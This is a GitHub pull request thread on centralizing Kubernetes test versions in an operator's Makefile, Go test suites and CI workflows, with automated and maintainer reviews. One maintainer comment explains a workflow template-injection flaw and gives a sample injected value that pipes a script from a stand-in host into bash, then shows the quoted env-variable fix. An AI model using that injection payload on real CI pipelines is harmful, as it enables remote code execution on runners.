Skip to content

ci(operator): centralize Kubernetes test versions#281

Open
AnouarMohamed wants to merge 7 commits into
NVIDIA:mainfrom
AnouarMohamed:fix/issue-238-k8s-test-versions
Open

ci(operator): centralize Kubernetes test versions#281
AnouarMohamed wants to merge 7 commits into
NVIDIA:mainfrom
AnouarMohamed:fix/issue-238-k8s-test-versions

Conversation

@AnouarMohamed

@AnouarMohamed AnouarMohamed commented Jun 15, 2026

Copy link
Copy Markdown
Contributor

Summary

  • add operator/k8s-test-versions.mk as the owner for envtest, Kind node image, Kind binary, and CI matrix versions
  • render the local ctlptl config from Make and validate kindest/node tags before Kind cluster creation
  • derive envtest BinaryAssetsDirectory in Go suites from the centralized version owner instead of hard-coded paths
  • load the same version outputs in operator and agent GitHub Actions, including path filters, cache keys, and least-privilege job permissions

Notes

upstream/main already uses envtest 1.36.0 while local/CI Kind node images remain on 1.35.0. This keeps those current values and documents the intentional split because Kind does not publish every Kubernetes patch version.

Closes #238.

Validation

  • make -C operator print-k8s-test-versions-github-output
  • make -C operator envtest
  • make -C operator render-ctlptl-config
  • make -C operator validate-kind-node-image
  • make -C operator validate-kind-node-image DOCKER_CMD=podman with a temporary Podman shim to confirm DOCKER_CMD is preferred
  • make -C operator -n create-kind-cluster
  • make -C operator -n create-deployment-policy-cluster
  • cd operator && make unit-tests (first run hit an envtest 1.36.0 startup timeout; retry passed)
  • workflow YAML parsed with PyYAML
  • git diff --check

@github-actions github-actions Bot added doc Documentation change (PR path label; doc issues use the Documentation type) component/operator Skyhook operator (controller-manager) component/ci CI workflows, GitHub Actions, and repo tooling labels Jun 15, 2026
@AnouarMohamed AnouarMohamed marked this pull request as ready for review June 15, 2026 03:27
@AnouarMohamed AnouarMohamed requested a review from a team June 15, 2026 03:27
@coderabbitai

coderabbitai Bot commented Jun 15, 2026

Copy link
Copy Markdown
Contributor

Review Change Stack

Note

Reviews paused

It looks like this branch is under active development. To avoid overwhelming you with review comments due to an influx of new commits, CodeRabbit has automatically paused this review. You can configure this behavior by changing the reviews.auto_review.auto_pause_after_reviewed_commits setting.

Use the following commands to manage reviews:

  • @coderabbitai resume to resume automatic reviews.
  • @coderabbitai review to trigger a single review.

Use the checkboxes below for quick actions:

  • ▶️ Resume reviews
  • 🔍 Trigger review
📝 Walkthrough

Walkthrough

operator/versions.yaml is introduced as the single source of truth for envtest, Kind node image, Kind binary, and CI matrix Kubernetes versions. A companion operator/versions.sh script provides yq-backed accessors (--get, --print, --export). operator/deps.mk now derives ENVTEST_K8S_VERSION from versions.sh and gains a yq install target. operator/Makefile removes the hardcoded KIND_VERSION default, adds validate-kind-node-image and render-ctlptl-config targets, and switches all cluster lifecycle targets to use a rendered ctlptl config templated from @@KIND_NODE_IMAGE_VERSION@@. Go test suites drop hard-coded envtest binary asset paths in favor of testenv.BinaryAssetsDirectory(). Both CI workflows gain a k8s-test-versions job that emits JSON version outputs consumed by a dynamic test matrix, and cache keys are updated to hash the new version files.

Estimated code review effort

🎯 4 (Complex) | ⏱️ ~60 minutes

🚥 Pre-merge checks | ✅ 3 | ❌ 1

❌ Failed checks (1 warning)

Check name Status Explanation Resolution
Out of Scope Changes check ⚠️ Warning The PR includes some out-of-scope changes: CODE_OF_CONDUCT.md link update and ROADMAP.md repository reference updates are unrelated to Kubernetes test version centralization. Remove or isolate CODE_OF_CONDUCT.md and ROADMAP.md changes into a separate housekeeping PR to keep this PR focused on version centralization.
✅ Passed checks (3 passed)
Check name Status Explanation
Title check ✅ Passed The title directly describes the primary change: centralizing Kubernetes test versions across the operator infrastructure.
Description check ✅ Passed The description clearly relates to the changeset, explaining the summary of changes, validation steps, and linking to issue #238.
Linked Issues check ✅ Passed The PR addresses all acceptance criteria from #238: centralizes version definitions, derives envtest configs from central source, validates Kind node tags, and establishes consistent version loading across workflows.

✏️ Tip: You can configure your own custom pre-merge checks in the settings.

✨ Finishing Touches
🧪 Generate unit tests (beta)
  • Create PR with unit tests

Comment @coderabbitai help to get the list of available commands.

@coderabbitai coderabbitai Bot left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 2

🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In @.github/workflows/operator-ci.yaml:
- Around line 68-84: Add a permissions block to the k8s-test-versions job to
enforce least privilege access. Since this job only checks out the repository
and runs a make command to print version information with no write or deployment
operations, add explicit minimal permissions (such as read-all or restricted
permissions) at the job level to reduce the attack surface if the job were
compromised.

In `@operator/Makefile`:
- Around line 166-179: The validate-kind-node-image target hardcodes docker as
the first choice for container command checking, which ignores the DOCKER_CMD
variable that may be configured to use podman instead. Update the conditional
logic to check for the DOCKER_CMD variable first before falling back to docker,
then podman, and finally curl. This ensures that if DOCKER_CMD is explicitly set
to podman, that preference is honored during image validation rather than
defaulting to docker if it exists on the system.
🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

  • Push a commit to this branch (recommended)
  • Create a new PR with the fixes

ℹ️ Review info
⚙️ Run configuration

Configuration used: Path: .coderabbit.yaml

Review profile: ASSERTIVE

Plan: Enterprise

Run ID: 8746bd17-b760-4ccd-be48-1ad24591a61a

📥 Commits

Reviewing files that changed from the base of the PR and between 81ef6be and d0d2e08.

📒 Files selected for processing (13)
  • .github/workflows/agent-ci.yaml
  • .github/workflows/operator-ci.yaml
  • docs/README.md
  • docs/development.md
  • docs/kubernetes-support.md
  • operator/Makefile
  • operator/README.md
  • operator/api/v1alpha1/webhook_suite_test.go
  • operator/config/local-dev/ctlptl-config.yaml
  • operator/deps.mk
  • operator/internal/controller/suite_test.go
  • operator/internal/testenv/envtest.go
  • operator/k8s-test-versions.mk

Comment thread .github/workflows/operator-ci.yaml Outdated
Comment thread operator/Makefile
Signed-off-by: AnouarMohamed <m.anouar@mundiapolis.ma>
@AnouarMohamed AnouarMohamed force-pushed the fix/issue-238-k8s-test-versions branch from d0d2e08 to 9d8e057 Compare June 15, 2026 11:42

@coderabbitai coderabbitai Bot left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 1

🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@operator/internal/testenv/envtest.go`:
- Around line 39-49: The function `BinaryAssetsDirectory` returns bare errors
from `findOperatorRoot()` and `makeDefault()` calls without wrapping them with
context. Wrap both error returns using `fmt.Errorf` with the `%w` verb to
provide diagnostic context, following the pattern `fmt.Errorf("descriptive
message: %w", err)` for each of the two return statements that currently return
bare `err` values.
🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

  • Push a commit to this branch (recommended)
  • Create a new PR with the fixes

ℹ️ Review info
⚙️ Run configuration

Configuration used: Path: .coderabbit.yaml

Review profile: ASSERTIVE

Plan: Enterprise

Run ID: 19a32c2d-a2cb-4982-a8b7-691b971b7a57

📥 Commits

Reviewing files that changed from the base of the PR and between d0d2e08 and 9d8e057.

📒 Files selected for processing (13)
  • .github/workflows/agent-ci.yaml
  • .github/workflows/operator-ci.yaml
  • docs/README.md
  • docs/development.md
  • docs/kubernetes-support.md
  • operator/Makefile
  • operator/README.md
  • operator/api/v1alpha1/webhook_suite_test.go
  • operator/config/local-dev/ctlptl-config.yaml
  • operator/deps.mk
  • operator/internal/controller/suite_test.go
  • operator/internal/testenv/envtest.go
  • operator/k8s-test-versions.mk

Comment thread operator/internal/testenv/envtest.go Outdated
@lockwobr

Copy link
Copy Markdown
Collaborator

First off, thank you for taking this on. This is thorough work: the validation checklist in the description is excellent, updating the docs in the same PR is exactly right, and validate-kind-node-image is a genuinely nice touch that'll save people the confusing failure when a kindest/node tag doesn't exist. Centralizing the test versions is a real improvement and clearly needed.

My main concern is the mechanism. The new internal/testenv/envtest.go hand-parses k8s-test-versions.mk (the findOperatorRoot walk plus the makeDefault line scanner). It's a bespoke Makefile parser that only understands NAME ?= value lines, so it'll silently pick the wrong value or break if that file ever grows a conditional, a computed default, a := assignment, or just gets reordered, with no signal when it does. Having Go re-parse a Makefile to recover values Make already knows is the fragile part.

The direction I'd suggest instead: make one source of truth that every consumer reads through a single small reader, and have nothing hand-roll a parser.

  • A versions file (e.g. versions.yaml) as the single place versions live.
  • A small reader script (versions.sh) as the only thing that reads it, using yq rather than hand-parsing: source versions.sh exports the values as env vars for dev shells and CI steps, and a --get <key> / --print mode feeds Make and the GitHub Actions outputs (the matrix can be emitted as JSON with yq -o=json).
  • The Makefile reads versions through that script as explicit variables (ENVTEST_K8S_VERSION := $(shell ./versions.sh --get envtestK8s)), so bare make still works and the Makefile stays readable, no blanket env injection.
  • Crucially, the Go side stops parsing anything. controller-runtime's envtest reads KUBEBUILDER_ASSETS natively (vendor/sigs.k8s.io/controller-runtime/pkg/envtest/server.go:172, pkg/internal/testing/process/bin_path_finder.go:43). If the Makefile runs setup-envtest use $(ENVTEST_K8S_VERSION) -p path and exports KUBEBUILDER_ASSETS, the test code can leave BinaryAssetsDirectory empty. That lets you delete envtest.go entirely and drop the hard-coded 1.36.0 paths from both suite_test.go files. For a raw go test outside make, set KUBEBUILDER_ASSETS via direnv/a documented source, or fall back to a single Go default constant.

This is a bigger change than the immediate bug, so totally reasonable to stage it: if you'd rather keep this PR tight, the minimal version is just the KUBEBUILDER_ASSETS swap to delete the Go parser, and the versions.yaml source-of-truth can be a follow-up. But I think that's the end state worth aiming for, and it also subsumes the separate-.mk-file question: with one reader, the file is no longer something Go has to keep parseable.

Thanks again for pushing this forward; it's close, and getting the version-reading out of Go would make it solid.

Signed-off-by: AnouarMohamed <m.anouar@mundiapolis.ma>
Signed-off-by: AnouarMohamed <m.anouar@mundiapolis.ma>
@AnouarMohamed

Copy link
Copy Markdown
Contributor Author

i think its ready now, check it out when you have time, thank you

@lockwobr lockwobr left a comment

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This is in good shape and the direction is exactly right. One thing I do want fixed before merge though.

Several of the new steps interpolate ${{ ... }} directly into run: blocks, where the value originates in versions.yaml. GitHub expands those expressions into the shell script as literal text before the shell runs, so a value containing shell metacharacters becomes executable code:

# operator-ci.yaml
make validate-kind-node-image KIND_NODE_IMAGE_VERSION=${{ matrix.k8s-version }}

# agent-ci.yaml
make validate-kind-node-image KIND_NODE_IMAGE_VERSION=${{ steps.k8s-versions.outputs.kind-node-image-version }}

A value like 1.35.0; curl evil.sh | bash would terminate the make command and run the rest. The blast radius on today's pull_request trigger is limited, but this workflow also runs on push (post-merge, where the token is read-write), and the pattern is exactly the kind of thing that turns into a real RCE the moment one of these steps moves under pull_request_target or a self-hosted runner. I'd rather not merge a template-injection pattern.

The fix is to bind the value to env: and reference the quoted shell variable, so it's passed as data the shell never parses:

- name: Validate KinD node image
  env:
    K8S_VERSION: ${{ matrix.k8s-version }}
  run: |
    cd operator
    make validate-kind-node-image KIND_NODE_IMAGE_VERSION="$K8S_VERSION"

Same treatment for the other ${{ matrix.* }} / ${{ steps.*.outputs.* }} references that land inside run:.

@AnouarMohamed AnouarMohamed requested a review from lockwobr June 26, 2026 14:58
@AnouarMohamed

Copy link
Copy Markdown
Contributor Author

hmm fair, i Moved the version/matrix values into env vars and quoted them

@AnouarMohamed

Copy link
Copy Markdown
Contributor Author

Same fix for the matrix platform and make target too.

@lockwobr lockwobr left a comment

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for opening this issue and driving it to complete. Everything looks good.

@lockwobr

Copy link
Copy Markdown
Collaborator

I am trying to get #286 before merging this, will merge later today is my plan.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

component/ci CI workflows, GitHub Actions, and repo tooling component/operator Skyhook operator (controller-manager) doc Documentation change (PR path label; doc issues use the Documentation type)

Projects

None yet

Development

Successfully merging this pull request may close these issues.

Unify Kubernetes test version sources

2 participants